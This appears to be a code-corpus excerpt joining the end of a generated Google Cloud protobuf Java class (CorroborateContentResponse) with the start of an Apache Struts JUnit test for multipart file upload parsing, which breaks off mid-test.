java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse)) { return super.equals(obj); } com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse other = (com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse) obj; if (hasCorroborationScore() != other.hasCorroborationScore()) return false; if (hasCorroborationScore()) { if (java.lang.Float.floatToIntBits(getCorroborationScore()) != java.lang.Float.floatToIntBits(other.getCorroborationScore())) return false; } if (!getClaimsList().equals(other.getClaimsList())) return false; if 
(!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); if (hasCorroborationScore()) { hash = (37 * hash) + CORROBORATION_SCORE_FIELD_NUMBER; hash = (53 * hash) + java.lang.Float.floatToIntBits(getCorroborationScore()); } if (getClaimsCount() > 0) { hash = (37 * hash) + CLAIMS_FIELD_NUMBER; hash = (53 * hash) + getClaimsList().hashCode(); } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse parseFrom( byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws 
com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder( 
com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * Response message for CorroborateContent. * </pre> * * Protobuf type {@code google.cloud.aiplatform.v1beta1.CorroborateContentResponse} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.aiplatform.v1beta1.CorroborateContentResponse) com.google.cloud.aiplatform.v1beta1.CorroborateContentResponseOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.aiplatform.v1beta1.VertexRagServiceProto .internal_static_google_cloud_aiplatform_v1beta1_CorroborateContentResponse_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.aiplatform.v1beta1.VertexRagServiceProto .internal_static_google_cloud_aiplatform_v1beta1_CorroborateContentResponse_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse.class, com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse.Builder.class); } // Construct using com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; corroborationScore_ = 0F; if (claimsBuilder_ == null) { claims_ = java.util.Collections.emptyList(); } else { claims_ 
= null; claimsBuilder_.clear(); } bitField0_ = (bitField0_ & ~0x00000002); return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.aiplatform.v1beta1.VertexRagServiceProto .internal_static_google_cloud_aiplatform_v1beta1_CorroborateContentResponse_descriptor; } @java.lang.Override public com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse getDefaultInstanceForType() { return com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse.getDefaultInstance(); } @java.lang.Override public com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse build() { com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse buildPartial() { com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse result = new com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse(this); buildPartialRepeatedFields(result); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartialRepeatedFields( com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse result) { if (claimsBuilder_ == null) { if (((bitField0_ & 0x00000002) != 0)) { claims_ = java.util.Collections.unmodifiableList(claims_); bitField0_ = (bitField0_ & ~0x00000002); } result.claims_ = claims_; } else { result.claims_ = claimsBuilder_.build(); } } private void buildPartial0( com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse result) { int from_bitField0_ = bitField0_; int to_bitField0_ = 0; if (((from_bitField0_ & 0x00000001) != 0)) { result.corroborationScore_ = corroborationScore_; to_bitField0_ |= 0x00000001; } result.bitField0_ |= to_bitField0_; } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder 
setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse) { return mergeFrom((com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse other) { if (other == com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse.getDefaultInstance()) return this; if (other.hasCorroborationScore()) { setCorroborationScore(other.getCorroborationScore()); } if (claimsBuilder_ == null) { if (!other.claims_.isEmpty()) { if (claims_.isEmpty()) { claims_ = other.claims_; bitField0_ = (bitField0_ & ~0x00000002); } else { ensureClaimsIsMutable(); claims_.addAll(other.claims_); } onChanged(); } } else { if (!other.claims_.isEmpty()) { if (claimsBuilder_.isEmpty()) { claimsBuilder_.dispose(); claimsBuilder_ = null; claims_ = other.claims_; bitField0_ = (bitField0_ & ~0x00000002); claimsBuilder_ = com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders ? 
getClaimsFieldBuilder() : null; } else { claimsBuilder_.addAllMessages(other.claims_); } } } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 13: { corroborationScore_ = input.readFloat(); bitField0_ |= 0x00000001; break; } // case 13 case 18: { com.google.cloud.aiplatform.v1beta1.Claim m = input.readMessage( com.google.cloud.aiplatform.v1beta1.Claim.parser(), extensionRegistry); if (claimsBuilder_ == null) { ensureClaimsIsMutable(); claims_.add(m); } else { claimsBuilder_.addMessage(m); } break; } // case 18 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private float corroborationScore_; /** * * * <pre> * Confidence score of corroborating content. Value is [0,1] with 1 is the * most confidence. * </pre> * * <code>optional float corroboration_score = 1;</code> * * @return Whether the corroborationScore field is set. */ @java.lang.Override public boolean hasCorroborationScore() { return ((bitField0_ & 0x00000001) != 0); } /** * * * <pre> * Confidence score of corroborating content. Value is [0,1] with 1 is the * most confidence. * </pre> * * <code>optional float corroboration_score = 1;</code> * * @return The corroborationScore. 
*/ @java.lang.Override public float getCorroborationScore() { return corroborationScore_; } /** * * * <pre> * Confidence score of corroborating content. Value is [0,1] with 1 is the * most confidence. * </pre> * * <code>optional float corroboration_score = 1;</code> * * @param value The corroborationScore to set. * @return This builder for chaining. */ public Builder setCorroborationScore(float value) { corroborationScore_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } /** * * * <pre> * Confidence score of corroborating content. Value is [0,1] with 1 is the * most confidence. * </pre> * * <code>optional float corroboration_score = 1;</code> * * @return This builder for chaining. */ public Builder clearCorroborationScore() { bitField0_ = (bitField0_ & ~0x00000001); corroborationScore_ = 0F; onChanged(); return this; } private java.util.List<com.google.cloud.aiplatform.v1beta1.Claim> claims_ = java.util.Collections.emptyList(); private void ensureClaimsIsMutable() { if (!((bitField0_ & 0x00000002) != 0)) { claims_ = new java.util.ArrayList<com.google.cloud.aiplatform.v1beta1.Claim>(claims_); bitField0_ |= 0x00000002; } } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.aiplatform.v1beta1.Claim, com.google.cloud.aiplatform.v1beta1.Claim.Builder, com.google.cloud.aiplatform.v1beta1.ClaimOrBuilder> claimsBuilder_; /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. * </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ public java.util.List<com.google.cloud.aiplatform.v1beta1.Claim> getClaimsList() { if (claimsBuilder_ == null) { return java.util.Collections.unmodifiableList(claims_); } else { return claimsBuilder_.getMessageList(); } } /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. 
* </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ public int getClaimsCount() { if (claimsBuilder_ == null) { return claims_.size(); } else { return claimsBuilder_.getCount(); } } /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. * </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ public com.google.cloud.aiplatform.v1beta1.Claim getClaims(int index) { if (claimsBuilder_ == null) { return claims_.get(index); } else { return claimsBuilder_.getMessage(index); } } /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. * </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ public Builder setClaims(int index, com.google.cloud.aiplatform.v1beta1.Claim value) { if (claimsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureClaimsIsMutable(); claims_.set(index, value); onChanged(); } else { claimsBuilder_.setMessage(index, value); } return this; } /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. * </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ public Builder setClaims( int index, com.google.cloud.aiplatform.v1beta1.Claim.Builder builderForValue) { if (claimsBuilder_ == null) { ensureClaimsIsMutable(); claims_.set(index, builderForValue.build()); onChanged(); } else { claimsBuilder_.setMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. 
* </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ public Builder addClaims(com.google.cloud.aiplatform.v1beta1.Claim value) { if (claimsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureClaimsIsMutable(); claims_.add(value); onChanged(); } else { claimsBuilder_.addMessage(value); } return this; } /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. * </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ public Builder addClaims(int index, com.google.cloud.aiplatform.v1beta1.Claim value) { if (claimsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensureClaimsIsMutable(); claims_.add(index, value); onChanged(); } else { claimsBuilder_.addMessage(index, value); } return this; } /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. * </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ public Builder addClaims(com.google.cloud.aiplatform.v1beta1.Claim.Builder builderForValue) { if (claimsBuilder_ == null) { ensureClaimsIsMutable(); claims_.add(builderForValue.build()); onChanged(); } else { claimsBuilder_.addMessage(builderForValue.build()); } return this; } /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. * </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ public Builder addClaims( int index, com.google.cloud.aiplatform.v1beta1.Claim.Builder builderForValue) { if (claimsBuilder_ == null) { ensureClaimsIsMutable(); claims_.add(index, builderForValue.build()); onChanged(); } else { claimsBuilder_.addMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. 
* </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ public Builder addAllClaims( java.lang.Iterable<? extends com.google.cloud.aiplatform.v1beta1.Claim> values) { if (claimsBuilder_ == null) { ensureClaimsIsMutable(); com.google.protobuf.AbstractMessageLite.Builder.addAll(values, claims_); onChanged(); } else { claimsBuilder_.addAllMessages(values); } return this; } /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. * </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ public Builder clearClaims() { if (claimsBuilder_ == null) { claims_ = java.util.Collections.emptyList(); bitField0_ = (bitField0_ & ~0x00000002); onChanged(); } else { claimsBuilder_.clear(); } return this; } /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. * </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ public Builder removeClaims(int index) { if (claimsBuilder_ == null) { ensureClaimsIsMutable(); claims_.remove(index); onChanged(); } else { claimsBuilder_.remove(index); } return this; } /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. * </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ public com.google.cloud.aiplatform.v1beta1.Claim.Builder getClaimsBuilder(int index) { return getClaimsFieldBuilder().getBuilder(index); } /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. 
* </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ public com.google.cloud.aiplatform.v1beta1.ClaimOrBuilder getClaimsOrBuilder(int index) { if (claimsBuilder_ == null) { return claims_.get(index); } else { return claimsBuilder_.getMessageOrBuilder(index); } } /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. * </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ public java.util.List<? extends com.google.cloud.aiplatform.v1beta1.ClaimOrBuilder> getClaimsOrBuilderList() { if (claimsBuilder_ != null) { return claimsBuilder_.getMessageOrBuilderList(); } else { return java.util.Collections.unmodifiableList(claims_); } } /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. * </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ public com.google.cloud.aiplatform.v1beta1.Claim.Builder addClaimsBuilder() { return getClaimsFieldBuilder() .addBuilder(com.google.cloud.aiplatform.v1beta1.Claim.getDefaultInstance()); } /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. * </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ public com.google.cloud.aiplatform.v1beta1.Claim.Builder addClaimsBuilder(int index) { return getClaimsFieldBuilder() .addBuilder(index, com.google.cloud.aiplatform.v1beta1.Claim.getDefaultInstance()); } /** * * * <pre> * Claims that are extracted from the input content and facts that support the * claims. 
* </pre> * * <code>repeated .google.cloud.aiplatform.v1beta1.Claim claims = 2;</code> */ public java.util.List<com.google.cloud.aiplatform.v1beta1.Claim.Builder> getClaimsBuilderList() { return getClaimsFieldBuilder().getBuilderList(); } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.aiplatform.v1beta1.Claim, com.google.cloud.aiplatform.v1beta1.Claim.Builder, com.google.cloud.aiplatform.v1beta1.ClaimOrBuilder> getClaimsFieldBuilder() { if (claimsBuilder_ == null) { claimsBuilder_ = new com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.aiplatform.v1beta1.Claim, com.google.cloud.aiplatform.v1beta1.Claim.Builder, com.google.cloud.aiplatform.v1beta1.ClaimOrBuilder>( claims_, ((bitField0_ & 0x00000002) != 0), getParentForChildren(), isClean()); claims_ = null; } return claimsBuilder_; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.aiplatform.v1beta1.CorroborateContentResponse) } // @@protoc_insertion_point(class_scope:google.cloud.aiplatform.v1beta1.CorroborateContentResponse) private static final com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse(); } public static com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<CorroborateContentResponse> PARSER = new com.google.protobuf.AbstractParser<CorroborateContentResponse>() { @java.lang.Override public CorroborateContentResponse parsePartialFrom( com.google.protobuf.CodedInputStream input, 
com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<CorroborateContentResponse> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<CorroborateContentResponse> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.aiplatform.v1beta1.CorroborateContentResponse getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
apache/struts
35,458
core/src/test/java/org/apache/struts2/dispatcher/multipart/AbstractMultiPartRequestTest.java
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.apache.struts2.dispatcher.multipart; import org.apache.commons.fileupload2.jakarta.servlet6.JakartaServletDiskFileUpload; import org.apache.struts2.dispatcher.LocalizedMessage; import org.assertj.core.api.InstanceOfAssertFactories; import org.junit.After; import org.junit.Before; import org.junit.BeforeClass; import org.junit.Test; import org.springframework.mock.web.MockHttpServletRequest; import java.io.File; import java.io.IOException; import java.nio.charset.StandardCharsets; import java.nio.file.Files; import java.nio.file.Path; import java.nio.file.Paths; import java.util.ArrayList; import java.util.List; import java.util.Map; import java.util.Objects; import static org.assertj.core.api.Assertions.assertThat; abstract class AbstractMultiPartRequestTest { protected static String tempDir; protected MockHttpServletRequest mockRequest; protected final String boundary = "_boundary_"; protected final String endline = "\r\n"; protected AbstractMultiPartRequest multiPart; abstract protected AbstractMultiPartRequest createMultipartRequest(); @BeforeClass public static void beforeClass() throws IOException { File tempFile = File.createTempFile("struts", "fileupload"); 
assertThat(tempFile.delete()).isTrue(); assertThat(tempFile.mkdirs()).isTrue(); tempDir = tempFile.getAbsolutePath(); } @Before public void before() { mockRequest = new MockHttpServletRequest(); mockRequest.setCharacterEncoding(StandardCharsets.UTF_8.name()); mockRequest.setMethod("post"); mockRequest.setContentType("multipart/form-data; boundary=" + boundary); multiPart = createMultipartRequest(); } @After public void after() { multiPart.cleanUp(); } @Test public void uploadedFilesToDisk() throws IOException { // given String content = formFile("file1", "test1.csv", "1,2,3,4") + formFile("file2", "test2.csv", "5,6,7,8") + endline + "--" + boundary + "--"; mockRequest.setContent(content.getBytes(StandardCharsets.UTF_8)); assertThat(JakartaServletDiskFileUpload.isMultipartContent(mockRequest)).isTrue(); // when multiPart.setBufferSize("1"); // always write files into disk multiPart.parse(mockRequest, tempDir); // then assertThat(multiPart.getErrors()) .isEmpty(); assertThat(multiPart.getFileParameterNames().asIterator()).toIterable() .asInstanceOf(InstanceOfAssertFactories.LIST) .containsOnly("file1", "file2"); assertThat(multiPart.getFile("file1")).allSatisfy(file -> { assertThat(file.isFile()) .isTrue(); assertThat(file.getOriginalName()) .isEqualTo("test1.csv"); assertThat(file.getContentType()) .isEqualTo("text/csv"); assertThat(file.getInputName()) .isEqualTo("file1"); assertThat(file.getContent()).asInstanceOf(InstanceOfAssertFactories.FILE) .exists() .content() .isEqualTo("1,2,3,4"); }); assertThat(multiPart.getFile("file2")).allSatisfy(file -> { assertThat(file.isFile()) .isTrue(); assertThat(file.getOriginalName()) .isEqualTo("test2.csv"); assertThat(file.getContentType()) .isEqualTo("text/csv"); assertThat(file.getInputName()) .isEqualTo("file2"); assertThat(file.getContent()) .asInstanceOf(InstanceOfAssertFactories.FILE) .exists() .content() .isEqualTo("5,6,7,8"); }); } @Test public void uploadedMultipleFilesToDisk() throws IOException { // given String 
content = formFile("file1", "test1.csv", "1,2,3,4") + formFile("file1", "test2.csv", "5,6,7,8") + endline + "--" + boundary + "--"; mockRequest.setContent(content.getBytes(StandardCharsets.UTF_8)); assertThat(JakartaServletDiskFileUpload.isMultipartContent(mockRequest)).isTrue(); // when multiPart.setBufferSize("1"); // always write files into disk multiPart.parse(mockRequest, tempDir); // then assertThat(multiPart.getErrors()) .isEmpty(); assertThat(multiPart.getFileParameterNames().asIterator()).toIterable() .asInstanceOf(InstanceOfAssertFactories.LIST) .containsOnly("file1"); assertThat(multiPart.getFile("file1")).allSatisfy(file -> { if (Objects.equals(file.getName(), "test1.csv")) { assertThat(file.isFile()) .isTrue(); assertThat(file.getOriginalName()) .isEqualTo("test1.csv"); assertThat(file.getContentType()) .isEqualTo("text/csv"); assertThat(file.getInputName()) .isEqualTo("file1"); assertThat(file.getContent()).asInstanceOf(InstanceOfAssertFactories.FILE) .exists() .content() .isEqualTo("1,2,3,4"); } if (Objects.equals(file.getName(), "test2.csv")) { assertThat(file.isFile()) .isTrue(); assertThat(file.getOriginalName()) .isEqualTo("test2.csv"); assertThat(file.getContentType()) .isEqualTo("text/csv"); assertThat(file.getInputName()) .isEqualTo("file1"); assertThat(file.getContent()) .asInstanceOf(InstanceOfAssertFactories.FILE) .exists() .content() .isEqualTo("5,6,7,8"); } }); } @Test public void uploadedFilesWithLargeBuffer() throws IOException { // given String content = formFile("file1", "test1.csv", "1,2,3,4") + formFile("file2", "test2.csv", "5,6,7,8") + endline + "--" + boundary + "--"; mockRequest.setContent(content.getBytes(StandardCharsets.UTF_8)); assertThat(JakartaServletDiskFileUpload.isMultipartContent(mockRequest)).isTrue(); // when multiPart.setBufferSize("8192"); // streams files into disk using larger buffer multiPart.parse(mockRequest, tempDir); // then assertThat(multiPart.getErrors()) .isEmpty(); 
assertThat(multiPart.getFileParameterNames().asIterator()).toIterable() .asInstanceOf(InstanceOfAssertFactories.LIST) .containsOnly("file1", "file2"); assertThat(multiPart.getFile("file1")).allSatisfy(file -> { assertThat(file.isFile()) .isTrue(); assertThat(file.getOriginalName()) .isEqualTo("test1.csv"); assertThat(file.getContentType()) .isEqualTo("text/csv"); assertThat(file.getInputName()) .isEqualTo("file1"); assertThat(file.getContent()) .asInstanceOf(InstanceOfAssertFactories.FILE) .exists() .content() .isEqualTo("1,2,3,4"); }); assertThat(multiPart.getFile("file2")).allSatisfy(file -> { assertThat(file.isFile()) .isTrue(); assertThat(file.getOriginalName()) .isEqualTo("test2.csv"); assertThat(file.getInputName()) .isEqualTo("file2"); assertThat(file.getContent()) .asInstanceOf(InstanceOfAssertFactories.FILE) .exists() .content() .isEqualTo("5,6,7,8"); }); } @Test public void cleanUp() throws IOException { // given String content = formFile("file1", "test1.csv", "1,2,3,4") + formFile("file2", "test2.csv", "5,6,7,8") + endline + "--" + boundary + "--"; mockRequest.setContent(content.getBytes(StandardCharsets.UTF_8)); assertThat(JakartaServletDiskFileUpload.isMultipartContent(mockRequest)).isTrue(); // when multiPart.parse(mockRequest, tempDir); // then assertThat(multiPart.getErrors()) .isEmpty(); assertThat(multiPart.getFileParameterNames().asIterator()).toIterable() .asInstanceOf(InstanceOfAssertFactories.LIST) .containsOnly("file1", "file2"); assertThat(multiPart.getFile("file1")).allSatisfy(file -> { assertThat(file.isFile()) .isTrue(); assertThat(file.getOriginalName()) .isEqualTo("test1.csv"); assertThat(file.getContentType()) .isEqualTo("text/csv"); assertThat(file.getInputName()) .isEqualTo("file1"); assertThat(file.getContent()).asInstanceOf(InstanceOfAssertFactories.FILE) .exists() .content() .isEqualTo("1,2,3,4"); }); assertThat(multiPart.getFile("file2")).allSatisfy(file -> { assertThat(file.isFile()) .isTrue(); assertThat(file.getOriginalName()) 
.isEqualTo("test2.csv"); assertThat(file.getContentType()) .isEqualTo("text/csv"); assertThat(file.getInputName()) .isEqualTo("file2"); assertThat(file.getContent()) .asInstanceOf(InstanceOfAssertFactories.FILE) .exists() .content() .isEqualTo("5,6,7,8"); }); List<UploadedFile> uploadedFiles = new ArrayList<>(); for (Map.Entry<String, List<UploadedFile>> entry : multiPart.uploadedFiles.entrySet()) { uploadedFiles.addAll(entry.getValue()); } // when multiPart.cleanUp(); // then assertThat(multiPart.uploadedFiles) .isEmpty(); assertThat(multiPart.parameters) .isEmpty(); assertThat(uploadedFiles).allSatisfy(file -> assertThat(file.getContent()).asInstanceOf(InstanceOfAssertFactories.FILE) .doesNotExist() ); } @Test public void nonMultiPartUpload() throws IOException { String content = formFile("file1", "test1.csv", "1,2,3,4") + formFile("file2", "test2.csv", "5,6,7,8") + endline + "--" + boundary + "--"; mockRequest.setContent(content.getBytes(StandardCharsets.UTF_8)); // given mockRequest.setContentType(""); // when multiPart.parse(mockRequest, tempDir); // then assertThat(multiPart.getErrors()) .map(LocalizedMessage::getTextKey) .containsExactly("struts.messages.upload.error.FileUploadContentTypeException"); assertThat(multiPart.getFileParameterNames().asIterator()).toIterable() .asInstanceOf(InstanceOfAssertFactories.LIST) .isEmpty(); } @Test public void maxSize() throws IOException { // given String content = formFile("file1", "test1.csv", "1,2,3,4") + formFile("file2", "test2.csv", "5,6,7,8") + endline + "--" + boundary + "--"; mockRequest.setContent(content.getBytes(StandardCharsets.UTF_8)); assertThat(JakartaServletDiskFileUpload.isMultipartContent(mockRequest)).isTrue(); // when multiPart.setMaxSize("1"); multiPart.parse(mockRequest, tempDir); // then assertThat(multiPart.uploadedFiles) .isEmpty(); 